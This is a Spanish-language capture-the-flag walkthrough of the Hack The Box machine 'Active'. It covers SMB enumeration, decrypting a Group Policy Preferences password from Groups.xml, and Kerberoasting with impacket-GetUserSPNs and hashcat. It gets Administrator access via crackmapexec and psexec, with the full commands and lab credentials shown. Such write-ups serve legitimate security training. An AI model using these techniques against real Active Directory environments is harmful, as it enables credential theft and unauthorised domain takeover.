🏳️Active

Datos
Notas

Nombre de la máquina:

Activve

IP de la máquina:

10.10.10.100

Sistema simulado:

Windows Server

Servicio vulnerado:

smb

CVEs:

1. Enumeración y descubrimiento

Comenzamos el ejercicio realizando un reconocimiento con NMAP a todos los puertos de la máquina Artic.

nmap -sC -sV -sT 10.10.10.100 -p-

Nos intentamos conectar mediante smb y listamos que directorios existen en el smb.

En este punto nos intentamos conectar en el directorio Replication que es el que nos llama la atención del smb al no ser habitual.

Vamos buscando dentro de los directorios y nos encontramos el fichero Groups.xml el cual nos descargamos mediante get Groups.xml

Vemos el contenido del fichero Groups el cual vamos a intentar desencriptar la contraseña. 

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties acti>
</Groups>

Utilizamos gpp-decryp y conseguimos la contraseña del usuario SVC_TGS

En este punto vamos a intentar acceder a los diferentes directorios con esa contraseña. Para ir algo más rápido vamos a automatizar mediante crackmapexec.

crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares

En este punto accedemos y podemos ver la flag del usuario.

2. Escalada de privilegios

En este punto tenemos que investigar como realizar la escalada de privilegios en el sistema.

Vamos a realizar un kerneroasting attack mediante impacket-GetUserSPNs con nuestras credenciales obtenidas para el usuario SVC_TGS y así obtendremos un hash de administrador.

impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18

Guardamos el hash en un fichero al cual aplicaremos fuerza bruta mediante el diccionario rockyou.txt con hashcat onteniendo la contraseña Ticketmaster1968.

hashcat -m 13100 -a 0 /root/2 /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt --force

Volvemos a utilizar crackmapexec para probar con los diferentes direcrotios del smb esta vez como el usuario administrador.

crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968

Con esto tendríamos acceso como root a la máquina y podriamos conectarnos a la misma y obtener acceso a la flag. 

impacket-psexec WORKGROUP/Administrator:Ticketmaster1968@active.htbsh

Si te he ayudado sígueme y apóyame en Hack The Box

AnteriorArticSiguienteOptimum

Última actualización

¿Te fue útil?